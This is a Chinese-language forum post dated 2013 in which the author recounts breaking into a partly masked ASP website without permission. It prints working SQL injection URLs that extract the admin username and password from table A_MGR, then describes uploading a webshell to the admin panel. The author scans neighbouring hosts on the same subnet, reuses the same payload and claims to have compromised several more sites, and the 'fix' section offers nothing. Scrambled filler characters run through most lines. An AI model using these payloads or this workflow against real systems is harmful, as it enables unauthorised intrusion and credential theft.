发现一个注入点
# Y- K# H/ C4 x- phttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833895 K& {9 W( \, V( q9 K
2 \7 s9 O' s1 b' v$ t. F习惯性的加’having1=1--3 j4 v+ f) [) B6 G5 K- v5 n+ N
4 D# I c8 G2 g' I' ?& _/ rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
* K' ^/ a' t$ K @2 R9 k5 Q
% g d Y9 ^9 Z3 Q% O/ e. _9 D0# X7 S4 e5 u- J/ H3 p7 s
2 A# l6 f4 r5 v" z$ |* Y4 z爆出Diary_A.dl_Title(这时候很激动啊)
& _3 A/ J( s9 o% e) r; t9 i2 g* v. m6 s5 b! j
那么继续# l J! c4 f/ ~- j
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—, `% G0 ^( t2 g9 P7 V
" k1 S( d. e# Q6 j3 ?& [继续,一直爆下去/ u9 s6 }4 M) ]$ O! r
) Q& s+ k% p: @
爆到几个字段和表段 但是没找到需要的管理用户的字段+ {% s1 }+ C6 |0 ^! S
* ^, F9 y$ q @+ s蛋疼了 怎么办 然后去后台登陆页看源码
$ S- W/ `- \0 |7 l. ]* U' A3 U! O" S6 h/ b4 F
0$ |4 J& X: q* M: I6 f# L
) Y* C/ @4 N; U- J n! fInput name= “ADUID”9 Z4 u# Z* o! f9 Y4 W2 n6 w
Input name= “ADPWD”
/ [+ e) W/ o6 Q% V8 O$ |8 \$ A3 {8 f5 ]
很幸运 找到了字段那就继续
9 I5 v, e6 h* K/ V4 |9 G; c: Y找到之后开始爆用户2 K) H( K& K6 ^1 A
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
8 W0 B. k/ `& p% {$ w7 k爆密码8 N, P* j. r/ `# A
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
' W6 D8 _1 A- ~测试了下 这个注入点只能爆到文章哪里的表
5 k5 C+ P$ T5 F2 [. w5 x0 S2 }' J: d
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
0 L! r, t j8 L, R9 a. [- H
0 K+ @) e1 [% p2 g7 g又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
2 N. s3 y. @/ d/ R* n
' m+ X3 L+ y! k+ r, y" J, P473
9 _, l# X4 ]5 V0 [" _* j
' m: S \" P# |3 X9 y0 V- e进后台
/ h, Y9 w$ J2 @ F/ C
9 e* w7 Y. v [# P! @; F9 l3 W4 m/ l/ k, h+ H3 r5 H
发现几个上传点 有的地方不能上传 而且防止恶意代码
& f1 d M7 ^& _. G1 Y& i3 B1 L& ~) Z9 g, b7 A/ K
没办法 各种百度各种找大牛 找到一只好像可以突破的马% P$ D( H1 [8 R8 w+ M
/ R* m, i. W' D8 W! O9 m" G, B" i, Y* z
在系统管理那里直接上传 不过没有显示地址
& c8 x2 `! I: N/ U& T4 Y3 x; T' ?. W- P
再上传一次 抓包 搞定OK6 |2 |+ x4 b2 @- ^$ b
+ H9 e# q( B/ Z' a! G. L
5 C4 u1 q( A. k6 Z# q; l4 {5 H
- \% {9 i% T3 }# V. K b
472
- `: n) l) P# l! C2 k
: c# ]% E4 d9 ?& \' @: `晚上不行了 去睡觉。。。0 q9 z' r- Y: E$ B, a
第二天刚起床 闲的没事做继续日站吧 / |$ b" \) ~& |* D4 x p1 u9 q
# ]6 `/ g) X+ W- R. v- M; G找个站 就把这个站的旁c扫了下
" Q* i: ^1 S/ _. k+ ~1 z( b) u' L2 d. d& G8 F3 K
发现c段也有一个购物站 ,然后还和这个站的模板差不多
T# D( ^8 \5 \# F' a: k, {. i
5 G& l' l, q4 ?* ^5 N. ]2 D/ f就找到会员登录口测试( Y) P# N8 ~5 d2 z% K/ G
) C- W) R8 f8 I, e1 d! H: ]
'and (select top 1 MGR_UID from A_MGR)>0—1 V6 w% |+ R$ N8 b
果断爆到了 这时候我很激动 通杀. w, k3 t: n# J% l
. V) z! B$ w, U8 t2 W" V再次翻c段
5 Z0 m( d# A( ~+ ^6 R% [
2 ^/ f0 M$ ~# @! K: L* T0 w翻出几个站 都成功拿下; J, d0 \# @4 e7 h, z
3 y+ _/ l- l9 W9 |8 p* j* b- l
7 z( H ^9 N6 X& |% f5 J4 f
- O0 ?' m- J' U
修复方案:4 I' N* Y2 C) \8 A. @: l
他们比我专业 % G$ `+ ]# c# H2 ]- D
5 L- @: O$ ` J) q( }, Z) V
* W3 f9 s* y5 U! Z9 A0 {4 r
9 u' c- N( j+ h/ c2 C+ s2 n' }5 l+ j |
发表于 2013-4-4 17:40:38
收藏
支持
反对